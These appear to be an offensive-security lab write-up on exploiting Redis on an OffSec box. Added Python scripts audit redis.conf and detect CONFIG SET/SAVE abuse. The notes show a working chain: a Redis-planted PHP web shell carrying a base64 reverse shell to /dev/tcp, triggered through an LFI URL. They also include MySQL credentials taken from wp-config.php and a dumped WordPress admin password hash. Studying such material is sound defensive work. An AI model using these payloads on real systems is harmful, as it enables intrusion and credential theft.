Offensive Security Notes

redis

redis-cli -a $pass -h $host

configuration location

/etc/redis/redis.conf

/etc/systemd/system/redis.service (the systemd unit file) to locate the user Redis runs as and the directories it is allowed to write files to
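Once you have found redis.conf, the question is whether it allows exactly the runtime changes used in the next section (CONFIG SET dir / dbfilename followed by SAVE). The script below is an added example, not part of the original notes or of Redis itself: it parses a redis.conf and flags the settings that make that file-write possible, with a constructed weak config beside a hardened one. The directive names (requirepass, bind, protected-mode, dir, rename-command, enable-protected-configs) are real Redis directives; the "standard data directory" heuristic and the sample file contents are assumptions.

```python
"""Audit a redis.conf for the settings that allow a client to rewrite dir /
dbfilename at runtime and dump a file of its choosing. Added example; the two
config texts are constructed for illustration, not taken from any host."""
import re
from typing import Dict, List

# Constructed weak configuration (everything commented out or wide open).
WEAK_CONF = """\
# Redis configuration file (constructed sample)
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
dir /opt/redis-files
dbfilename dump.rdb
"""

# Constructed hardened counterpart of the same file.
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass CHANGE_ME_long_random_secret
dir /var/lib/redis
dbfilename dump.rdb
rename-command CONFIG ""
enable-protected-configs no
"""

# Heuristic: dumps written anywhere else (a web root, /opt, /tmp) deserve a look.
STANDARD_DATA_DIR = "/var/lib/redis"


def parse_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to the list of argument strings it was given.
    A directive may repeat (several rename-command lines), so keep a list.
    Blank lines and '#' comments are skipped."""
    directives: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        rest = parts[1].strip() if len(parts) > 1 else ""
        directives.setdefault(key, []).append(rest)
    return directives


def audit(text: str) -> List[str]:
    """Return findings as strings; an empty list means nothing weak was found."""
    conf = parse_conf(text)
    findings: List[str] = []

    # 1. No password: anyone who can reach the port can issue CONFIG SET.
    if not any(a.strip('"') for a in conf.get("requirepass", [])):
        findings.append("requirepass not set: unauthenticated clients can run CONFIG SET")

    # 2. bind missing or wildcard: the port is reachable from other hosts.
    bind = conf.get("bind", [""])[-1].split()
    if not bind or any(a in ("0.0.0.0", "*", "::") for a in bind):
        findings.append("bind missing or wildcard: port reachable from other hosts")

    # 3. protected-mode defaults to yes; 'no' removes the last safety net.
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: remote clients accepted without a password")

    # 4. dir outside the data directory: dump files may land somewhere served or executed.
    data_dir = conf.get("dir", ["./"])[-1]
    if not data_dir.startswith(STANDARD_DATA_DIR):
        findings.append(f"dir {data_dir}: dump file written outside {STANDARD_DATA_DIR}")

    # 5. CONFIG still usable and dir/dbfilename not protected (enable-protected-configs
    #    exists from Redis 7; 'no' blocks CONFIG SET of dir and dbfilename).
    config_renamed = any(
        re.fullmatch(r'config\s+""', a, re.I) for a in conf.get("rename-command", [])
    )
    protected = conf.get("enable-protected-configs", [""])[-1].lower() == "no"
    if not (config_renamed or protected):
        findings.append(
            "CONFIG SET dir/dbfilename allowed: rename CONFIG or set enable-protected-configs no"
        )
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}] {len(audit(text))} finding(s)")
        for f in audit(text):
            print("  -", f)
```

Point it at a real file with `audit(open("/etc/redis/redis.conf").read())`. On the weak sample every check fires; on the hardened sample none does, because renaming CONFIG (or, on Redis 7+, leaving enable-protected-configs at no) removes the dir/dbfilename rewrite regardless of what else the attacker can do.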

reverse shell

192.168.191.166:6379> flushall
OK
192.168.191.166:6379> config get dir
1) "dir"
2) "/opt/redis-files"
192.168.191.166:6379> config set dbfilename test.php
OK
192.168.191.166:6379> set test "<?php system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40OS4xOTEvODAgMD4mMQ== | base64 -d | bash'); ?>"
OK
192.168.191.166:6379> save
OK

Then trigger the test.php file you created. If you have an LFI, you can do so with a request like the one below:

http://readys.offsec/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/opt/redis-files/test.php
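The session above is also what a defender should be watching for: CONFIG SET of dir or dbfilename is almost never issued by an application, and a SAVE shortly after it from the same client is the moment the file is written. The detector below is an added example, not code from the original notes or from Redis: it parses lines in the format that the real MONITOR command emits (`<timestamp> [<db> <client>] "cmd" "arg" ...`), keeps per-client state, and raises alerts. The sample lines are constructed with documentation-range addresses and a placeholder value, and the baseline dir/dbfilename are assumed parameters.

```python
"""Flag the CONFIG SET dir/dbfilename + SAVE pattern in Redis MONITOR output.
Added example; the sample lines below are constructed, not captured from a host."""
import re
from typing import Dict, List, Optional, Tuple

# Real MONITOR line shape: 1339518083.107412 [0 127.0.0.1:60866] "keys" "*"
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<argv>.*)$')
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample: client .10 performs the sequence from the notes,
# client .20 changes dir to the same value it already had and saves.
SAMPLE_MONITOR = """\
1700000000.100000 [0 192.0.2.10:40001] "flushall"
1700000000.200000 [0 192.0.2.10:40001] "config" "get" "dir"
1700000000.300000 [0 192.0.2.10:40001] "config" "set" "dbfilename" "test.php"
1700000000.400000 [0 192.0.2.10:40001] "set" "test" "PLACEHOLDER_CONTENT"
1700000000.500000 [0 192.0.2.10:40001] "save"
1700000000.600000 [0 192.0.2.20:40002] "get" "session:abc"
1700000000.700000 [0 192.0.2.20:40002] "config" "set" "dir" "/var/lib/redis"
1700000000.800000 [0 192.0.2.20:40002] "save"
"""

Alert = Tuple[str, str, str]  # (client, severity, message)


def parse_monitor_line(line: str) -> Optional[Tuple[str, str, List[str]]]:
    """Return (timestamp, client, argv) for one MONITOR line, or None if it
    does not match the format (e.g. the leading 'OK')."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group("ts"), m.group("client"), QUOTED_RE.findall(m.group("argv"))


def detect(lines: List[str],
           baseline_dir: str = "/var/lib/redis",
           baseline_dbfilename: str = "dump.rdb") -> List[Alert]:
    """Walk MONITOR lines in order and alert on:
    - any CONFIG SET dir / dbfilename (medium; high if the new filename is not .rdb)
    - SAVE/BGSAVE by a client that changed either (high if the resulting path
      differs from the baseline dump path, medium otherwise)."""
    state: Dict[str, Dict[str, object]] = {}
    alerts: List[Alert] = []
    baseline_path = f"{baseline_dir.rstrip('/')}/{baseline_dbfilename}"
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        _, client, argv = parsed
        cmd = argv[0].lower()
        st = state.setdefault(client, {"dir": baseline_dir,
                                       "dbfilename": baseline_dbfilename,
                                       "touched": False})
        if (cmd == "config" and len(argv) >= 4 and argv[1].lower() == "set"
                and argv[2].lower() in ("dir", "dbfilename")):
            key, value = argv[2].lower(), argv[3]
            st[key] = value
            st["touched"] = True
            # A dump file that is not *.rdb is the classic web-shell / key write.
            odd_name = key == "dbfilename" and not value.lower().endswith(".rdb")
            alerts.append((client, "high" if odd_name else "medium", f"CONFIG SET {key} {value}"))
        elif cmd in ("save", "bgsave") and st["touched"]:
            path = f"{str(st['dir']).rstrip('/')}/{st['dbfilename']}"
            severity = "high" if path != baseline_path else "medium"
            alerts.append((client, severity,
                           f"{cmd.upper()} writes dump to {path} after CONFIG SET by this client"))
    return alerts


if __name__ == "__main__":
    for client, severity, msg in detect(SAMPLE_MONITOR.splitlines()):
        print(f"{severity:6} {client:20} {msg}")
```

MONITOR itself costs throughput, so in practice feed the same parser from a proxy or from `redis-cli monitor` written to a file on a test instance; the point of the state machine is that the SAVE, not the CONFIG SET, is when the file appears on disk, so the alert names the resulting path. With the hardened config from the previous section (CONFIG renamed away) none of these commands would succeed at all, and the detector becomes a backstop rather than the only control.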

Enumerated the wp-config.php file to get the MySQL login (karl / Wordpress1234).

Enumerated the users in the database; nothing interesting there.

alice@readys:/var/www$ mysql -u karl -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 106
Server version: 10.3.31-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.000 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email    | user_url         | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 | admin         | test@test.com | http://localhost | 2021-07-11 16:35:27 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.000 sec)

MariaDB [wordpress]> quit
Bye

Running LSE (linux-smart-enumeration) shows only one interesting item: a cron job running as root every 3 minutes.


Last updated 3 years ago